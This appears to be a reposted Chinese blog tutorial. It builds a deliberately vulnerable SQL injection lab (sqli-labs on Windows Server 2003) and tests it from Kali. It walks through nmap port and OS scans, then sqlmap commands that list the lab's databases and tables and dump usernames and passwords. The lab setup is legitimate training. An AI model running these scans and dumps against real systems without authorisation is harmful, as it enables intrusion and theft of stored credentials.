Win Server 2003搭建Sql注入环境
生活随笔
收集整理的這篇文章主要介紹了
Win Server 2003搭建Sql注入环境
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
- 參考博客【SQL注入系列(一)——超詳細SQL注入環(huán)境搭建】,原博主寫得更為詳細,如有疑惑,可參考原文章
實驗環(huán)境說明
| 服務器 | Windows Server 2003 | 192.168.43.128 |
| 攻擊者 | Kali 5.3.0 | 192.168.43.5 |
軟件及環(huán)境下載
-
下載phpstudy,運行Apache和MySql
- 【phpstudy官網(wǎng)】
- 我下載的是適用Windows的2016的版本【下載地址】
-
下載靶機環(huán)境
- 【Github項目地址】
- 【阿里云盤下載地址】(因為有分享限制,已經(jīng)將壓縮包解壓)
軟件安裝與環(huán)境部署
- 安裝phpstudy軟件,注意安裝路徑,可能需要修改
- 因為使用的是虛擬機環(huán)境,我是將軟件安裝在E:\phpStudy下的
- 需要關閉防火墻(因為作為靶機使用,安裝完成系統(tǒng)后,就已經(jīng)將防火墻關閉了)
- 安裝完成后,啟動phpStudy,同時啟動服務
- 因為服務器還開啟了IIS服務,所以80端口被占用,這里修改為了8080端口。如果啟動服務端口被占用,可以關閉相應端口的服務或者更換phpStudy的服務端口
-
訪問測試
- 使用地址192.168.43.128:8080/phpinfo.php(如果沒有修改端口,則不需要使用端口號)
- 出現(xiàn)如下情況即表示成功
-
將靶場環(huán)境復制進服務器中
- 將下載的靶場環(huán)境文件放入到phpStudy的環(huán)境中
- 將整個sqli-labs-master 文件夾復制到E:\phpStudy\WWW中(如果是Github下載的壓縮包,需要解壓)
- 找到E:\phpStudy\WWW\penetration\sql-connections文件夾下的db-creds.inc文件,將$dbpass =''后的引號內(nèi)添加數(shù)據(jù)庫的密碼($dbpass ='root')
- Github項目的需要自己更改,阿里云盤下載的已經(jīng)修改了
- 如果更改過MySql數(shù)據(jù)庫的密碼,可以通過以下方式查看密碼
- 訪問靶場環(huán)境測試
- 使用http://192.168.43.128:8080/sqli-labs-master訪問測試(這里我修改了靶場環(huán)境的文件夾名,所以是http://192.168.43.128:8080/penetration)
- 點擊Setup/reset Database for labs檢查是否可以正常連接數(shù)據(jù)庫
- 環(huán)境搭建完成!
Kali測試
nmap測試
-
nmap的端口狀態(tài)
-
open:端口是開放的
-
closed:端口是關閉的
-
filtered:端口被 Firewall/IDS/IPS 屏蔽,無法確定其狀態(tài)
-
unfiltered:端口沒有被屏蔽,但是否開放需要進一步確定
-
open|filtered:端口是開放的或被屏蔽
-
closed|filtered:端口是關閉的或被屏蔽
-
-
常用選項
- -p 掃描指定端口
- -f 快速模式-掃描比默認掃描更少的端口
- -v 顯示掃描過程
- -A 全面系統(tǒng)檢測、啟用腳本檢測、掃描等
- -V 顯示版本號
- -h 幫助信息
- -exclude-ports 從掃描中排除指定端口
- -top-ports 掃描最常用的端口
- -open 僅顯示開放的端口
- -sS 使用TCP的SYN進行掃描
- -sT 使用TCP進行掃描
- -sU UDP掃描
- 參考博客
- 【Nmap使用方法_半磚的博客-CSDN博客_nmap使用教程】
- 【nmap詳細使用教程_Rex Xie的博客-CSDN博客_nmap使用教程】
-
使用命令nmap -p 22,23,80,3389 192.168.43.128,掃描22、23、80、3389端口是否開啟
- 由掃描結(jié)果可以看到只開啟了80和3389端口
- 使用命令nmap -O 192.168.43.128,掃描主機的操作系統(tǒng)
- 根據(jù)掃描結(jié)果,可以看到主機開放的端口和主機的操作系統(tǒng)
sqlmap測試
- 在使用sqlmap工具時,報錯[22:18:19] [WARNING] you haven't updated sqlmap for more than 920 days!!!
- 使用命令sqlmap --update更新sqlmap工具
- 要保證Kali可以聯(lián)網(wǎng)
- 常用選項
- -h 幫助文檔
- -v 顯示詳細信息
- -d 直接連接數(shù)據(jù)庫
- -u 指定url掃描,url必須存在查詢參數(shù)。例 xxx.php?id=1
- -l 后面跟一個log文件,判斷l(xiāng)og(日志)文件中所有記錄是否存在注入點
- -?-version 查看sqlmap版本信息
- -?-dbs 查看目標服務器有什么數(shù)據(jù)庫
- -?-tables 目標主機中的數(shù)據(jù)庫有什么數(shù)據(jù)表
- -?-columns 獲取目標主機中數(shù)據(jù)庫的列數(shù)信息
- -?-dump 查詢指定范圍的所有數(shù)據(jù)
- -?-search 查詢目的主機是否存在相當應的列、表和數(shù)據(jù)庫
- -D 指定數(shù)據(jù)庫
- -T 指定數(shù)據(jù)表
- -C 指定字段
- 參考博客
- 【sqlmap 使用教程_月生ψ的博客-CSDN博客_sqlmap使用教程】
- 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1"掃描,檢查是否存在注入漏洞
- 可以看到靶機的PHP、Apache、MySQL的版本信息
- URL后一定要有?id=1
- 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" -dbs,獲取數(shù)據(jù)庫信息
- 可以看到存在的數(shù)據(jù)庫
- 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" -D test --tables,獲取數(shù)據(jù)庫中的表單信息
- 可以看到test數(shù)據(jù)庫中的存在的表單
- 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" -D test -T badboy --columns,獲取表單中的所有字段信息
- 可以看到badboy表單中所有的字段信息
- 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" -D test -T badboy -C username --dump,獲取表單中的指定字段的內(nèi)容信息
- 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" -D test -T badboy -C password --dump,獲取表單中的admin的密碼信息
- 在進行測試的過程中,在服務器更改了數(shù)據(jù)庫內(nèi)容,添加了表單,但是在使用Sqlmap獲取數(shù)據(jù)庫表單時,沒有更新出新的表單。服務重啟、服務器重啟、Kali重啟都還是沒有更新出新的表單
- 因為sqlmap在進行注入時,會有緩存記錄保存在 /root/.local/share/sqlmap/output中
- 解決辦法
- 使用命令rm -rf /root/.sqlmap/output/x.x.x.x刪除舊的緩存記錄,x.x.x.x表示注入的IP地址。刪除后重新啟動
- 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" --purge清理緩存
以上內(nèi)容均屬原創(chuàng),如有不詳或錯誤,敬請指出。 本文作者: 壞壞 本文鏈接: http://t.csdn.cn/KTtHS 版權(quán)聲明: 本博客所有文章除特別聲明外,均采用 CC BY-NC-SA 4.0 許可協(xié)議。轉(zhuǎn)載請聯(lián)系作者注明出處并附帶本文鏈接!
總結(jié)
以上是生活随笔為你收集整理的Win Server 2003搭建Sql注入环境的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Createjs的控件 BitMap、M
- 下一篇: 误差理论与数据处理(一)